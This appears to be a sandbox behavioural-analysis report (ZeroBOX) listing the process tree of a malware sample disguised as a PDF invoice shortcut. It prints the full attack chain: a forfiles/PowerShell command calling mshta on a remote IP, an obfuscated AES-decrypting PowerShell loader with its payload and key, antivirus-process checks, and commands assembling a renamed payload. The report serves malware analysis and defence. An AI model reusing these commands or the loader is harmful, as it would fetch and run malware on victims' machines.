| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "oNazQWYhScNFuhbQ" C:\Users\test22\AppData\Local\Temp\Factura_SA161.pdf.lnk
3024
- forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://93.190.140.76/factura"
  2192
  - powershell.exe . mshta http://93.190.140.76/factura
    2256
    - mshta.exe "C:\Windows\system32\mshta.exe" http://93.190.140.76/factura
      2416
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function Dkebzp($jGtIwqJ){return -split ($jGtIwqJ -replace '..', '0x$& ')};$qyhPLTp = Dkebzp('1711092BF9B0498E1CB3F4FCA27BB53436B88A01640435E5544FA921AD2DF68E704CD4BB33CC6D0BA46D3C6172782EC2C90561C76FCED9E514DA0CAA9E39B7FDA05C272D80561D30155EB5B51897C6CB92DB0E76E31D061AB77FA7AEB21E8E441B112651FB0C5FECB36D8BDCD7E0B75FA0AD39EADA43CD96C5C1CD910083C175604A60D47F14DEF0CB354A0458A60E0EA40D7236C03AC86390606577402C984DA3CEF04F2EBEF0A8656EF717E1131705E9CA15915C784DA81E9154A9D688AEFDFD68158BEC1A035AFCA5088667E17128D162A371E69C25CE60D4C15879B04750388663E6460323D62DD4E9372DA3D5E418E389DB5642ADDB9DAA165C5E622939EEBA483EE7D59C67C6D3D50F5EBDCF34D3E2319CF22199398DDD5EC04779802A0933109DE65D44F793DE33452EDDF22D2B3A89830A8576D7392FBBD0951223FAD29F498F3180159FF0FBC97F729331AFC56B1015A89D5AA31F004277692BF5F902DA31CB75DB3F4EF2B69083B17F08B20119A1A08A78A4A766DBEE9E581E2662ABD0ACFACD26F8F5574E2F30B93EEDBEB316A3BA01096F17EB7E6DCA66B3A05666AF0FC469B56A1749D7B414D5F2CCB9F7C0211AEFAB19C30D189AF44924FE1A82AA64A984A3BE40DAA7BB8800C2B5DF8CD45530C988B0B3C741FB02B66343612758142A2EDB4403A33711D583464DD1C042F81628136AA31D370768398745BDC47A3915AF5C567AD476DB6B358CC8812F36C7C36ED81D1E0033CCD8F328430DBE1946FB6D80E5E3E7420E288EC860E969E05214ED2DD3D213BC9B8ABF347683FD30364243FF0CE947D7E8F7F33EE23FC6849F3F7FE450A5DA73AFD10A6B0BDD8A76C13BD787F111E42C465FCFD1FDC0E45F755102873D071FC4A9636AA862AFE6BF7C6F8822AAF3E385F70A2D175D482CB92ABA004204105D01B8845C7648ED3006B097FA5E95EF4E2FE337E70B0648E9DF2164205C09536D8EA64C31E8D75BB88645C3D160245D5F636744EB817008ED14CCD29B1FAC9B3CEB6F823DDE8CFD0617D49D6083FDC0EAF4097789859B3D77FD4860B5FE475B0267E75A0773FAC2F23A67C9B576FB3050AA93ACFB28BCC1E550FF106331190F8803607EB09D95FE69AE0F521461F9E901D294AFB18E0E55491FD35822662DE76CF1D23EAA0E91156B7172F588AC14A04DA595B48AAE953F9889C2E26CB13F2AB257C97DC6D7E5D00FBF7361AF5FD57731F84675C96A2C6316B179B8926173B8DFFE4C2ACC62ACD5A245EACDAB5E3CF6380F641AF1333712D7A910BD38C59EEE1E69C9F6A929E54775852C579C8447BD5BFC35B81EECB1EB65A3CFA4E76749158193053E9860100A2ACA41B747C7468E97236D191C109611DD580E764A19BCBA4C983B1796B03632652F28B437FD99DF743127BC897CF97039BAAAADDE0C758658DF3502517269834AFA2D69CA5CE622662C39FBD196BA05B0C11572A1B133B51316A3D3CD781100276103CABFBB98359B198DA8F71641EF53CA3BF72D6B54FA02718DF65C1D87C08394F4D9573D61115CBAC645066116B363A803F06D54BEF08D50D4B5CCCE9CD1031477D258E7C116129807D01128CA39D32A00E29BA9D45079B7E6BFF36ABBA9792C80FD03D0A021E5F53521554DF5CDD5EF625D60F00AA503CAF0F30870D5E33C623CAF35543080ACD33439311A0A0B');$rGETn = [System.Security.Cryptography.Aes]::Create();$rGETn.Key = Dkebzp('636158597A4E53476158574947456D5A');$rGETn.IV = New-Object byte[] 16;$hNXGKDGH = $rGETn.CreateDecryptor();$rdOdyccxC = $hNXGKDGH.TransformFinalBlock($qyhPLTp, 0, $qyhPLTp.Length);$PMOsBUvsZ = [System.Text.Encoding]::Utf8.GetString($rdOdyccxC);$hNXGKDGH.Dispose();& $PMOsBUvsZ.Substring(0,3) $PMOsBUvsZ.Substring(3)
        1140
        
        AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\test22\AppData\Roaming\SA160.pdf"
        1680
        
        DisabilityCharge.exe "C:\Users\test22\AppData\Roaming\DisabilityCharge.exe"
        2676
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c move Observed Observed.bat && Observed.bat
        2836
        
        findstr.exe findstr /I "wrsa.exe opssvc.exe"
        2512
        
        tasklist.exe tasklist
        2496
        
        tasklist.exe tasklist
        1652
        
        findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        2536
        
        cmd.exe cmd /c md 5125865
        1700
        
        findstr.exe findstr /V "AndreaAccessibleOriginallyElizabeth" Ons
        1720
        
        cmd.exe cmd /c copy /b 5125865\Cheers.pif + Software + Cap + Typing + Cingular + Dominican 5125865\Cheers.pif
        1192
        
        cmd.exe cmd /c copy /b Customs + Placing + Anatomy + Church 5125865\M
        1648
        
        Cheers.pif 5125865\Cheers.pif 5125865\M
        2732
        
        PING.EXE ping -n 5 127.0.0.1
        2956
explorer.exe C:\Windows\Explorer.EXE
1236

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents